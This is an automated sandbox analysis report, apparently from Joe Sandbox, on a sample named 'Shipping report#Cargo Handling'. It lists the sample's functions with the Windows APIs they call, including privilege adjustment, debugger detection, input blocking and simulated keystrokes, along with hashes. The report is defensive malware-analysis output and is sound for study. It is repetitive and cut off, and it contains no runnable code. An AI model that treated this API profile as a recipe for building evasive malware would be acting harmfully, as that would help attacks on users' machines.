Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 3e7ab124e5fa271f6ee3c4629e6d91454e77254739be94a3617fdf52e07f3d53
Instruction ID: 8540c87b6bfc749bed5b99b8a41a568d216cfe32ba28b68d0e7576be6fa94e0b
Opcode Fuzzy Hash: 3e7ab124e5fa271f6ee3c4629e6d91454e77254739be94a3617fdf52e07f3d53
Instruction Fuzzy Hash: 7B31B474911218ABCB61DF64DC89BDDB7B8AF08710F5046EAE41CA6261E7709F818F45

Function 001051CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001051DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00105238
SetErrorMode.KERNEL32(00000000), ref: 001052A1

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 9e82de055af75b1bc41a5f2d244bef5bdca48a4c0a070b69cf34512bcd443ed3
Instruction ID: 1df3d877893a461e7bbe76d84cadb572b256ea7d98656377e465bc6adcf99e0b
Opcode Fuzzy Hash: 9e82de055af75b1bc41a5f2d244bef5bdca48a4c0a070b69cf34512bcd443ed3
Instruction Fuzzy Hash: 85317F35A00508DFDB00DF54D885EAEBBB5FF08314F048099E949AB392DB71E856CB90

Function 000F16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 000AFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 000B0668
Part of subcall function 000AFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 000B0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000F170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000F173A
GetLastError.KERNEL32 ref: 000F174A

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 2207c3240b0b2994fa7656e72910488ff6eeabcc141ec352225b2c3cda68426a
Instruction ID: 27345c813f9ba9c0dccfcc1bb383316c6cdde683389a55ba4d5d2979a3dd3f3c
Opcode Fuzzy Hash: 2207c3240b0b2994fa7656e72910488ff6eeabcc141ec352225b2c3cda68426a
Instruction Fuzzy Hash: 9A11B2B1404309BFD728AF94DC86DBBB7B9EB04714B20852EF15653641EB70BC428A60

Function 000FD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 000FD608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 000FD645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 000FD650

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 3b1bd197fcd804ef29ac3416d371ef370492259fa283e9f23f05cee42039d81c
Instruction ID: d95bb5b2e72813a9771d167bf5873e63b2fedccbb62843ef912c0273e78d1e29
Opcode Fuzzy Hash: 3b1bd197fcd804ef29ac3416d371ef370492259fa283e9f23f05cee42039d81c
Instruction Fuzzy Hash: 1D115E75E05228BFDB209F95DC45FAFBBBCEB45B60F108116FA04E7290D6704A059BE1

Function 000F1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 000F168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 000F16A1
FreeSid.ADVAPI32(?), ref: 000F16B1

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 63b1fa4839698b5852d1622e48d39d87337f56681752689f431bc7005b67ab6a
Instruction ID: 4baafbdb156827be661e216d4501861959c186549417ac1bebbb6af72a77591a
Opcode Fuzzy Hash: 63b1fa4839698b5852d1622e48d39d87337f56681752689f431bc7005b67ab6a
Instruction Fuzzy Hash: 82F0447594030CFBDB00CFE09C89EAEBBBCFB08240F104460E600E2180E330AA448A94

Function 000B4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000C28E9,?,000B4CBE,000C28E9,001588B8,0000000C,000B4E15,000C28E9,00000002,00000000,?,000C28E9), ref: 000B4D09
TerminateProcess.KERNEL32(00000000,?,000B4CBE,000C28E9,001588B8,0000000C,000B4E15,000C28E9,00000002,00000000,?,000C28E9), ref: 000B4D10
ExitProcess.KERNEL32 ref: 000B4D22

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: d2aead819a1528c23b78a2c0e8b30ef216100ed6dd52462135450f1c645ae384
Instruction ID: 15937b01fed9f3c0362c40406d4c32fa5d0e34fe59aff0d1305a001921bb31b0
Opcode Fuzzy Hash: d2aead819a1528c23b78a2c0e8b30ef216100ed6dd52462135450f1c645ae384
Instruction Fuzzy Hash: 97E0B631000548BFCF21AF54DD0AA9C3B69FB41795B108418FD059A523CB35DEA2DB84

Function 000ED27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 000ED28C

Strings

X64, xrefs: 000ED2A8

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 33b210fa8988c805cee619452f1aa4f730405b3acdfce99ecad5513ec5ee0dfb
Instruction ID: 4959b95ab888944258f23babbf826d5ffb6353c7e50ca6efa9bbfcb165ad3f13
Opcode Fuzzy Hash: 33b210fa8988c805cee619452f1aa4f730405b3acdfce99ecad5513ec5ee0dfb
Instruction Fuzzy Hash: A9D0C9B480111DEECBA4CB90DC88DDDB37CBB14305F100156F206A2000D73095498F10

Function 000BCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 3c5661b153d666c77b46a57bb711abd4f419abc7a6cd860a53748c34461f7708
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 88020C71E002199BDF14CFA9C880AEEBBF1EF58314F25816AD919EB385D731AD41CB94

Function 001068EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00106918
FindClose.KERNEL32(00000000), ref: 00106961

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 26509fa332f8fcc813d734ddabd988e46a604678925809fd08e523e06d8b7e07
Instruction ID: b8f06dfe8fdc1a9b955eaaf9cf3f9ae154c117958c505fed5fef397e5b9da858
Opcode Fuzzy Hash: 26509fa332f8fcc813d734ddabd988e46a604678925809fd08e523e06d8b7e07
Instruction Fuzzy Hash: BE11D0316042009FD710CF29C484E1ABBE1FF88328F04C6A9F4A98F6A2CB70EC45CB90

Function 001037B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00114891,?,?,00000035,?), ref: 001037E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00114891,?,?,00000035,?), ref: 001037F4

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: cbf573c023299fa0a9f3660b97967f184f8ce38b318512037773b6aa600c118b
Instruction ID: b3691e4fff76b17e421690c70d424e48a3b6795e63a48d6581bdb25674e32ded
Opcode Fuzzy Hash: cbf573c023299fa0a9f3660b97967f184f8ce38b318512037773b6aa600c118b
Instruction Fuzzy Hash: 25F0ECB06043147AE72057658C4DFDB365EEFC4761F000175F505D22C1DA605944C6F0

Function 000FB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 000FB25D
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 000FB270

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 76f9eaa1335aca446fc9a6675b226c7d23b31d581ff4c0168934c3c0219864e4
Instruction ID: 394722a617b5bed27f68726105ce8dddade11faadc821ac404aaf8c10c660ef5
Opcode Fuzzy Hash: 76f9eaa1335aca446fc9a6675b226c7d23b31d581ff4c0168934c3c0219864e4
Instruction Fuzzy Hash: 4AF01D7190428EABDF159FA0C805BBE7BB4FF04305F108009FA55A5191C779C6519F94

Function 000F10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000F11FC), ref: 000F10D4
CloseHandle.KERNEL32(?,?,000F11FC), ref: 000F10E9

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: ffb68bf86f86d4365a1bff1ad7e3d57344ae94ab53cb706c4ba36a1745b3222c
Instruction ID: 3b898e8d83123a5b84cb77c0dd4811344494025e1822553f78ec94d93553a629
Opcode Fuzzy Hash: ffb68bf86f86d4365a1bff1ad7e3d57344ae94ab53cb706c4ba36a1745b3222c
Instruction Fuzzy Hash: 91E04F32004601FEE7352BA1FC05EB777E9EB04320B20882DF5A5808B1DB626CE1DB54

Function 0009CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 000E0C40

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: e2df26c4788a9bd545fa1168fe707b5ab557f095986db0813e54458e99f27c4b
Instruction ID: 5fff9dd219863b841069593f35cf5f157b58d8f26ac41e73e1f56e1259a85a17
Opcode Fuzzy Hash: e2df26c4788a9bd545fa1168fe707b5ab557f095986db0813e54458e99f27c4b
Instruction Fuzzy Hash: C0329A70D00218DFEF24DF90C994EEDB7B5BF05304F648069E806AB292D775AE85EB60

Function 000C676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000C6766,?,?,00000008,?,?,000CFEFE,00000000), ref: 000C6998

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 72f4091c5a19eb9168f8ca2a16932f4a3ca107cdeb8d26d689d37ae9178f3a30
Instruction ID: 52424ee0faacaf57d5b286547cab90b3cbbea75d134aa7a37c903153dcfb84d4
Opcode Fuzzy Hash: 72f4091c5a19eb9168f8ca2a16932f4a3ca107cdeb8d26d689d37ae9178f3a30
Instruction Fuzzy Hash: D3B13A316106089FD765CF28C48AF697BE0FF45364F25865CE89ACF2A2C736E995CB40

Function 000AB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 000E851F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7111b9de5aa54939826ab5017f4bd0239f19251763a01fa83bb1727c12b6cbd9
Instruction ID: 23c9a4e1a617a116953ce32162dd396e9c81f3212deb1c2bfeed6dda109369f4
Opcode Fuzzy Hash: 7111b9de5aa54939826ab5017f4bd0239f19251763a01fa83bb1727c12b6cbd9
Instruction Fuzzy Hash: 391241759002299FDB64CF99C8806EEB7F5FF49710F14819AE849EB256DB309E81CF90

Function 0010EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0010EABD

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 44233fe0ff8cfe7e6cc1c8c2f31808d60e11be809880e10683dde57bff323136
Instruction ID: d3fc19e2b0d8d0f630c84f36615cd01830a12a6d2802c1796e2a6b01e9864a5a
Opcode Fuzzy Hash: 44233fe0ff8cfe7e6cc1c8c2f31808d60e11be809880e10683dde57bff323136
Instruction Fuzzy Hash: 25E012312002049FDB10DF5AD404E9AB7D9AF58760F018816FD49C7392D7B0A8418B90

Function 000B09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,000B03EE), ref: 000B09DA

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5953b017e4da601f13dd779321d6f6bfb92208504190f4909766cb6afa3e4bfb
Instruction ID: b6f442f93870b2d5f207a92ff420546b5d51c8f277db45df706e92173996cdbc
Opcode Fuzzy Hash: 5953b017e4da601f13dd779321d6f6bfb92208504190f4909766cb6afa3e4bfb
Instruction Fuzzy Hash:

Function 000B781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 000B798B

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 2e5ec99669f2568df286449df61852f2a1d5d5e198990dcbf8f5005831033cd1
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: EF51677168C7055BDBB88968885EBFE23D99BD2340F280519D88ED7393CE15DE01D356

Function 000C6DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 835704769e6a4d69ccb7bbbcdbc67405a7f3ddaf60bf831896e0dbbe1fd23818
Instruction ID: 3cb888abb25315208bcb32ed3945212b2bdce3f687fff458139afb35a41d134e
Opcode Fuzzy Hash: 835704769e6a4d69ccb7bbbcdbc67405a7f3ddaf60bf831896e0dbbe1fd23818
Instruction Fuzzy Hash: DC320232D29F014DD7239634D82233AA689AFB73D5F15D73BE81AB5DA6EB29C4C34500

Function 000ACC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddba3f50c87ded65e4f0cf65e2f3e1c040e08b60615770530559e23b9889ef4b
Instruction ID: 52d2c98bbc4782b27acf2cab2c1a1a6bfd70148536667ce68ea0c001a0b23d5a
Opcode Fuzzy Hash: ddba3f50c87ded65e4f0cf65e2f3e1c040e08b60615770530559e23b9889ef4b
Instruction Fuzzy Hash: B8324831A082858FFF78CB6AC494E7D77E1EB46314F29852AD459AB291D332DD82DB01

Function 00097920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

